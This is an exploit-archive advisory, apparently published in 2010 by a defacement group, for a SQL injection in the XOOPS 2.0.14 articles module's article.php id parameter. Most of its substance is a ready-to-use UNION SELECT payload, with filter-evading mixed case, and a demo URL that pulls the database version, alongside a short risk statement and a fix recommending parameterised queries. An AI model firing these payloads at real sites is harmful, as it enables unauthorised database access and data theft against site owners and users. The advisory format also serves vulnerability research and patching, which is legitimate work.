XOOPS 2.0.14 (article.php) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XOOPS 2.0.14 (article.php) SQL Injection Vulnerability
# Published : 2010-08-28
# Author : []0iZy5
# Previous Title : CF Image Hosting Script 1.3 (settings.cdb) Information Disclosure Vulnerability
# Next Title : Blogman v0.7.1 (profile.php) SQL Injection Exploit

##################################################################
##################################################################
#          ___   ___  _   _____        __                   _    #
#         / _  / _ | | |  __       / _|                 | |   #
#    _ __| | | | | | | |_| |  | | ___| |_ __ _  ___ ___  __| |   #
#   | '__| | | | | | | __| |  | |/ _   _/ _` |/ __/ _ / _` |   #
#   | |  | |_| | |_| | |_| |__| |  __/ || (_| | (_|  __/ (_| |   #
#   |_|   ___/ ___/ __|_____/ ___|_| __,_|______|__,_|   #
#                                                                #
#                                                                #
#                                             +-+-+-+-+          #
#                                             |C|r|e|w|          #
#                                             +-+-+-+-+          #
##################################################################
##################################################################
# [#] XOOPS 2.0.14 (article.php) SQL Injection Vulnerability     #
# [#] Discovered By []0iZy5                                      #
# [#] http://r00tDefaced.com & uNkn0wn.eu(is back)               #
# [#] Greetz: Gn0515, Silic0n, my bb(denys) & r00tDefaced Members#
##################################################################
#
# [2]-SQL injection
#
# Vulnerability Description:
#               SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an #application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby unexpectedly executed.
#
# Affected items:
#          http://127.0.0.1/path/modules/articles/article.php?id=[SQL Injection]
#          
# Example: -1337+uNiOn+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- [You can find the number of vulnerable query]
# Demo: http://www.site.com/modules/articles/article.php?id=1%20union%20all%20select%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
#
# The Risk:
#     By exploiting this vulnerability, an attacker can inject malicious code in the script and can have access to the database.
#
# Fix the vulnerability:
#     To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parametrized statements must be used #(preferred), or user input must be carefully escaped or filtered.
#
#################################################################
#################################################################
 
# r00tDefaced.com [28/08/2010]